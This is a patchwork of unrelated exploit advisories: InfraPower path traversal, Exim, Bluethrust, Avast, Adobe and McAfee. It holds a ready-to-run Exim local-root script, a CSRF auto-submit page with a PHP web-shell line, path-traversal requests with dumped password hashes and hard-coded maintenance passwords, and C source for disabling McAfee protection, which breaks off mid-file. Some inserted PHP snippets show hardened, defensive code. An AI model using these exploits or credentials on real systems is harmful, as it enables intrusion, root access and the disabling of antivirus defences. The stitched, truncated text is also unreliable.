InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.
-------------------------------------------------------------------
ListFile.php:
-------------
if(isset($_GET['file'])){
    $handle = $_GET['file'];
    $fp = fopen('/ramdisk/'.$handle, 'r');
    while(!feof($fp)){
        $tmp=fgets($fp,2000);
        $tmp = str_replace("\n","<br />",$tmp);
        echo $tmp;
    }
    fclose($fp);
}
-------------------------------------------------------------------
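A hardened form of the read shown above, as an added example; it is not the vendor's fix in Q216V3, whose code this page does not show. It resolves the requested name with realpath() and serves the file only if the result stays below the base directory. The function name read_contained_file() and the constructed test tree are assumptions for illustration.

```php
<?php
// Added example, not vendor code. read_contained_file() is a hypothetical name.
// Syntax is kept compatible with the PHP 5.3 series listed under "Tested on".

function read_contained_file($requested, $base)
{
    // Only non-empty strings without NUL bytes are considered at all.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // realpath() collapses "../" and resolves symlinks; false means "does not exist".
    $target = realpath($baseReal . '/' . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base *with* a trailing slash, so a sibling such as
    // /ramdisk2 cannot pass a prefix test meant for /ramdisk.
    $prefix = rtrim($baseReal, '/') . '/';
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $data = file_get_contents($target);
    return $data === false ? null : $data;
}

if (PHP_SAPI === 'cli') {
    // Constructed self-check: a throwaway tree standing in for /ramdisk.
    $root = sys_get_temp_dir() . '/listfile_demo_' . getmypid();
    mkdir($root . '/ramdisk', 0700, true);
    mkdir($root . '/ramdisk2', 0700, true);
    file_put_contents($root . '/ramdisk/status.log', "line1\nline2\n");
    file_put_contents($root . '/ramdisk2/other.log', "sibling\n");
    file_put_contents($root . '/outside.txt', "outside\n");

    // Requested name => whether it should be served.
    $cases = array(
        'status.log'                      => true,
        '../outside.txt'                  => false,
        '../ramdisk2/other.log'           => false,
        '../../../../../../../etc/passwd' => false,
        'missing.log'                     => false,
    );
    foreach ($cases as $name => $expected) {
        $served = read_contained_file($name, $root . '/ramdisk') !== null;
        printf("%-34s served=%-3s %s\n", $name, $served ? 'yes' : 'no',
            $served === $expected ? 'ok' : 'UNEXPECTED');
    }

    // Remove the constructed tree again.
    unlink($root . '/ramdisk/status.log');
    unlink($root . '/ramdisk2/other.log');
    unlink($root . '/outside.txt');
    rmdir($root . '/ramdisk');
    rmdir($root . '/ramdisk2');
    rmdir($root);
} elseif (isset($_GET['file'])) {
    $data = read_contained_file($_GET['file'], '/ramdisk');
    if ($data === null) {
        header('HTTP/1.1 404 Not Found');
        exit;
    }
    // Escape before echoing; ISO-8859-1 accepts any byte, so nothing is dropped.
    echo nl2br(htmlspecialchars($data, ENT_QUOTES, 'ISO-8859-1'));
}
```

Filtering "../" out of the string is not a substitute for this check: the comparison has to be made on the resolved path, after symlinks and relative segments have been collapsed.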
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5370
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
27.09.2016
--
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
LoginAuth 1
UserName 00000000
Password 00000000
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
dmin 999999
manager 666666
user 111111
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
#!/bin/sh
echo -n "Please enter maintenance password:"
read -s pass
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
if [ "$InfraType" == "1" ]; then
if [ "$pass" != "InfraSolution" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "2" ]; then
if [ "$pass" != "InfraGuard" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "3" ]; then
if [ "$pass" != "InfraPower" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "4" ]; then
if [ "$pass" != "InfraCool" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
#---emergency recovery mode
echo "DEBUG su mode started!"
su
fi
fi
fi
fi
# create menu
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
while true; do
echo -n "Input Maintenance menu item number(? for help):"
read y
case $y in
"?")
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
;;
"1")
echo "****/mnt/mtd/main_conf******************************"
vi /mnt/mtd/main_conf
echo "****************************************************"
;;
"2")
echo "****/mnt/mtd/snmp_conf******************************"
cat /mnt/mtd/snmp_conf
echo "****************************************************"
;;
"3")
echo "****/mnt/mtd/net_conf*******************************"
cat /mnt/mtd/net_conf
echo "****************************************************"
;;
"4")
echo "****/mnt/mtd/web_conf*******************************"
cat /mnt/mtd/web_conf
echo "****************************************************"
;;
"5")
echo "(5) Enable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans5
if [ "$ans5" == "y" ]; then
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
echo -n "Patching boot.sh ..."
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
chmod 777 /mnt/mtd/boot.sh
if [ -f "/mnt/mtd/boot.sh" ]; then
echo "...done"
else
echo "...fail"
fi
else
echo "file not exist: /mnt/mtd/patch/boot.sh"
fi
fi
;;
"6")
echo "(6) Disable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans6
if [ "$ans6" == "y" ]; then
if [ -f "/mnt/mtd/boot.sh" ]; then
echo -n "Disabling boot.sh pacthing..."
rm /mnt/mtd/boot.sh
echo "...done"
else
echo "File not exist: /mnt/mtd/boot.sh"
fi
fi
;;
"7")
echo "(7) Clear /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans7
if [ "$ans7" == "y" ]; then
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
rm -r /mnt/mtd/patch/*
if [ ! -f "/mnt/mtd/patch/" ]; then
echo "...done"
echo -n "Reboot to apply changes? [y/n]:"
read ans7r
if [ "$ans7r" == "y" ]; then
echo "Rebooting..."
reboot
fi
else
echo "...fail"
fi
fi
;;
"8")
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/patch_now.sh" ]; then
chmod 777 /www/patch/patch_now.sh
sh /www/patch/patch_now.sh
else
echo "file not exist: /www/patch/patch_now.sh"
fi
fi
;;
"9")
echo "****Process List*******************************"
ps
echo "***********************************************"
;;
"A")
echo "(A) Patch SNMP "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/snmplink.sh" ]; then
sh /www/patch/snmplink.sh
if [ -f "/www/snmplink.log" ]; then
cat /www/snmplink.log
fi
echo "Patching SNMP and its modules...done"
else
echo "file not exist: /www/patch/snmplink.sh"
fi
fi
;;
"B")
echo "(B) Restore Box Configuration(box_conf) "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/etc/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf..."
cp /etc/box_conf /mnt/mtd/box_conf
if [ -f "/mnt/mtd/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf...done"
else
echo "Patching /mnt/mtd/box_conf...failed"
fi
else
echo "file not exist: /etc/box_conf"
fi
fi
;;
"P")
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
echo "(P) Restore INI, POL profiles for $INFRA_VER "
echo -n "Are you sure to continue? [y/n]:"
read ansP
if [ "$ansP" == "y" ]; then
if [ "$InfraType" == "1" ]; then
echo "Restoring INI, POL profiles for $INFRA_VER..."
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
echo "...done"
fi
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
echo "...done"
fi
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
echo "...done"
fi
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
echo "...done"
fi
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
echo "...done"
fi
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
echo "...done"
fi
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
echo "...done"
fi
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
echo "...done"
fi
fi
fi
;;
"E")
echo -n "Input command line:"
read cmd_line
$cmd_line
;;
"M")
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
cat /mnt/mtd/log_memCheck.txt
fi
;;
"R")
echo "(R) Reboot "
echo -n "Are you sure to continue? [y/n]:"
read ansR
if [ "$ansR" == "y" ]; then
echo "Rebooting..."
reboot
fi
;;
"X")
echo "su mode started!"
su
;;
"Q")
echo "Leaving maintenance mode........OK"
exit 0
;;
esac
done
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" argument -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
<!--
Exploit title: Bluethrust Clan Scripts v4 R17 CSRF & PHP Shell Upload (Admin)
Exploit: Brandon Murphy https://www.linkedin.com/in/brandonm86
Vendor Homepage: https://bluethrust.com
Tested on: Windows 7/Firefox
Exploit Description:
Stable with Firefox 44.0. Other browsers may be unstable or may not work. Only Bluethrust Clan Scripts v4 R17 was tested but other versions may be vulnerable!
CSRF
Note: The developer applied the patch to the webapp without changing the revision number which could cause confusion to customers.
---------------------
There is no token check when changing a current user rank thus allowing CSRF to take place. When the code below is executed by an authenticated admin it will grant the defined user Commander/Admin rights.
PHP Shell Upload
-----------------------
After CSRF has taken place you can login to your account like normal. Once logged in click "My Profile>Administrator options>Modify Current Theme" or use site.com/members/console.php?cID=61. You can then insert the PHP code of your choosing into Footer. In order to add or edit code you are required to provide a special Admin Key that was defined during install. The key isn't needed as the check is faulty and can be left blank. Just insert your code and click Edit Theme. It will say the key was incorrect, but the PHP code is still inserted.
e.g. <?php $cmd=$_REQUEST['cmd']; system($cmd); ?> put into the footer code. site.com/themes/destiny/_footer.php?cmd=dir for command execution.
Timeline:
2/6/2016 - Dev notified of vulnerabilities
2/6/2016 - Dev acknowledges vulnerabilities
2/7/2016 - Patch applied and made public
3/7/2016 - Public Disclosure
Disclaimer:
I cannot be held accountable for anything you do with this code.
You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<form action="http://site.com/clan/members/console.php?cID=8" method="POST">
<input type="hidden" name="member" value="4"/> <!-- User ID to be granted Admin -->
<input type="hidden" name="newrank" value="41"/> <!-- 41 is Commander/Admin -->
<input type="hidden" name="reason" value=""/>
<input type="hidden" name="freezetime" value="0"/>
<input type="hidden" name="submit" value="Set+Rank"/>
</form>
<script>
document.createElement('form').submit.call(document.forms[0]);
window.location.href = "http://site.com/clan/members/"; <!-- Redirect admin after CSRF takes place to avoid pop-up notification -->
</script>
</html>
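Both flaws described above come down to a state-changing handler that keeps going when a check is missing or has failed. The sketch below is an added example, not Bluethrust's code or its patch, and assumes PHP 7 or later: the function names, the session layout and the `csrf`, `adminkey` and `footer` field names are hypothetical; only `member`, `newrank`, `reason`, `freezetime` and `submit` come from the PoC form.

```php
<?php
// Added example with hypothetical names; sessions and POST bodies are plain
// arrays here so the script runs from the command line.

function csrf_issue(array &$session)
{
    // One unpredictable token per session, rendered as a hidden form field.
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrf_valid(array $session, array $post)
{
    return isset($session['csrf'], $post['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

function set_rank(array $session, array $post)
{
    if (empty($session['is_admin'])) {
        return 'denied: not an admin session';
    }
    // A cross-site form post carries the admin's cookie but cannot know the token.
    if (!csrf_valid($session, $post)) {
        return 'denied: missing or wrong CSRF token';
    }
    return sprintf('member %d set to rank %d', (int) $post['member'], (int) $post['newrank']);
}

function edit_theme_footer(array $session, array $post, $adminKeyHash, &$footer)
{
    if (empty($session['is_admin']) || !csrf_valid($session, $post)) {
        return 'denied: not authorised';
    }
    $key = isset($post['adminkey']) && is_string($post['adminkey']) ? $post['adminkey'] : '';
    // Fail closed: return before any write, so the error message and the
    // stored state cannot disagree.
    if ($key === '' || !password_verify($key, $adminKeyHash)) {
        return 'denied: incorrect admin key';
    }
    $footer = (string) $post['footer'];
    return 'theme updated';
}

// --- Constructed demonstration data -------------------------------------
$session = array('is_admin' => true);
$token   = csrf_issue($session);

// Same fields as the PoC form: no token, because a third-party page cannot read it.
$forged = array('member' => '4', 'newrank' => '41', 'reason' => '',
                'freezetime' => '0', 'submit' => 'Set+Rank');
echo set_rank($session, $forged), "\n";
echo set_rank($session, $forged + array('csrf' => $token)), "\n";

$keyHash = password_hash('constructed-install-key', PASSWORD_DEFAULT);
$footer  = '<p>original footer</p>';

// Blank key, as in the description above: rejected and nothing is written.
echo edit_theme_footer($session,
    array('csrf' => $token, 'adminkey' => '', 'footer' => 'changed'),
    $keyHash, $footer), "\n";
echo 'footer unchanged after rejected edit: ',
    ($footer === '<p>original footer</p>' ? 'yes' : 'no'), "\n";

// Correct key: the write goes through.
echo edit_theme_footer($session,
    array('csrf' => $token, 'adminkey' => 'constructed-install-key', 'footer' => '<p>new</p>'),
    $keyHash, $footer), "\n";
```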
Source: https://code.google.com/p/google-security-research/issues/detail?id=668
The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.
(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55 push ebp
740b4446 56 push esi
740b4447 57 push edi
740b4448 33ff xor edi,edi
740b444a 8be9 mov ebp,ecx
740b444c 85db test ebx,ebx
740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418 mov esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0 30303030
# It looks like this address was a parameter, let's skip up a frame and see where it comes from
0:080> kvn 3
# ChildEBP RetAddr Args to Child..............
WARNING: Stack unwind information not available. Following frames may be wrong.
00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
0:080> .frame /c 1
01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x81be:
740b483e 8bf8 mov edi,eax
0:080> ub.
aswCmnBS_74080000!StreamHashClose+0x81aa:
740b482a 0000 add byte ptr [eax],al
740b482c 0001 add byte ptr [ecx],al
740b482e 0000 add byte ptr [eax],al
740b4830 00ff add bh,bh
740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
740b4834 8bce mov ecx,esi
740b4836 ff7040 push dword ptr [eax+40h]
740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
# The parameter comes from eax+40:
0:080> dd eax+40 L1
128be3a4 30303030
# What is that address?
0:080> !address @eax
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 128b8000
End Address: 128ea000
Region Size: 00032000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 12150000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x120000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x128be364
# It's a heap buffer, is it valid?
0:080> !heap -x 0x128be364
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
# Looks okay to me, where does that buffer come from?
0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c add esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000 add byte ptr [eax],al
740c37d5 0000 add byte ptr [eax],al
740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
740c37da 57 push edi
740c37db 0345e8 add eax,dword ptr [ebp-18h]
740c37de 50 push eax
740c37df ff7510 push dword ptr [ebp+10h]
740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c 57d9ddea
That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
This looks like broken authenticode parsing to me.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip
########################################################################################
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
########################################################################################
===================
Introduction:
===================
Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
other digital publications. Use it to download and purchase digital content, which can
be read both online and offline. Transfer copy-protected eBooks from your personal
computer to other computers or devices. Organize your eBooks into a custom library and
annotate pages. Digital Editions also supports industry-standard eBook formats,
including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
########################################################################################
===================
Report Timeline:
===================
2015-10-24: Pier-Luc Maltais from COSIG found the issue and reported it to Adobe PSIRT.
2016-03-08: Vendor fixed the issue (APSB16-06).
2016-03-08: Release of this advisory.
########################################################################################
===================
Technical details:
===================
A critical memory corruption occurs when Adobe Digital Editions handles a specially
crafted ExtGstate object, which could lead to remote code execution.
########################################################################################
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
########################################################################################
/*
Security Advisory @ Mediaservice.net Srl
(#01, 13/04/2016) Data Security Division
Title: McAfee VirusScan Enterprise security restrictions bypass
Application: McAfee VirusScan Enterprise 8.8 and prior versions
Platform: Microsoft Windows
Description: A local Windows administrator is able to bypass the
security restrictions and disable the antivirus engine
without knowing the correct management password
Author: Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Fixed
References: http://lab.mediaservice.net/advisory/2016-01-mcafee.txt
http://lab.mediaservice.net/code/mcafee_unprotector.c
1. Abstract.
McAfee VirusScan Enterprise has a feature to protect the scan engine
from local Windows administrators. A management password is needed to
disable it, unless Windows is running in "Safe Mode".
From our understanding this feature is implemented insecurely: the
McAfee VirusScan Console checks the password and requests the engine to
unlock the safe registry keys. No checks are done by the engine itself,
so anyone can directly request the engine to stop without knowing the
correct management password.
2. Example Attack Session.
The attack can be reproduced in different ways, here are some examples.
Example 1:
Open the McAfee VirusScan Console and Sysinternals Process Explorer.
Under Process Explorer:
- Locate the mcconsol.exe process
- Type CTRL+L (show lower pane)
- Search for all "HKLM\SOFTWARE\McAfee\DesktopProtection" keys
- Close all the handles of this registry key
Go back to the McAfee Console and:
- Go to: Tools -> General Options
- Select the "Password Options" tab
- Select "No password" and apply settings
Now it is possible to stop the antivirus engine.
Example 2:
A specific tool has been written to request to disable password
protection. After running the tool you can disable it via the VirusScan
Console.
Code: http://lab.mediaservice.net/code/mcafee_unprotector.c
3. Affected Platforms.
All McAfee VirusScan Enterprise versions prior to 8.8 without SB10151 are
affected. Exploitation of this vulnerability requires that an attacker
has local Windows administrator privileges.
4. Fix.
On 25 February 2016, version SB10151 hotfix has been released by McAfee,
which fixes the described vulnerability.
https://kc.mcafee.com/corporate/index?page=content&id=SB10151
5. Proof Of Concept.
See Example Attack Session above.
6. Timeline
07/11/2014 - First communication sent to McAfee
17/11/2014 - Second communication sent to McAfee
17/11/2014 - McAfee: Request to send again vulnerability information
18/11/2014 - Sent vulnerability information and PoC again
11/12/2014 - McAfee: Problem confirmed
09/03/2015 - Request for update to McAfee
06/05/2015 - Request for update to McAfee
06/05/2015 - McAfee: Patch release planned for Q3
20/08/2015 - McAfee: Request for deadline delay (31/03/2016)
25/02/2016 - McAfee: SB10151 patch has been released
Copyright (c) 2014-2016 @ Mediaservice.net Srl. All rights reserved.
--
Maurizio Agazzini CISSP, CSSLP, OPST
Senior Security Advisor
@ Mediaservice.net Srl Tel: +39-011-32.72.100
Via Santorelli, 15 Fax: +39-011-32.46.497
10095 Grugliasco (TO) ITALY http://mediaservice.net/disclaimer
"C programmers never die. They are just cast into void"
*/
/*****************************************************************************
* *
* McAfee Data Protector "Unprotector" *
* *
* A little tool to request McAfee scan engine to disable password *
* protection. *
* *
* Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt *
* *
* This program can be compiled with MinGW (http://www.mingw.org/) *
* *
* Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved *
* Wrote by Maurizio Agazzini <inode[at]mediaservice.net> *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation; either version 2 *
* of the License, or (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place *
* Suite 330, Boston, MA 02111-1307, USA. *
* *
*****************************************************************************/
#include <stdio.h>
#include <windows.h>
HANDLE opendevice()
{
HANDLE result;
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
result = 0;
return result;
}
void main(int argc, char ** argv)
{
HKEY reg_key = NULL;
HANDLE p;
DWORD BytesReturned;
DWORD data = 0;
unsigned long size = 4;
DWORD type = REG_DWORD;
DWORD data1 = 0;
char status[4][70]= {
"No password",
"Password protection for all items listed",
"Password protection for the selected items",
"Password protection for conformance to Common Criteria"
};
printf("\n *******************************************\n");
printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
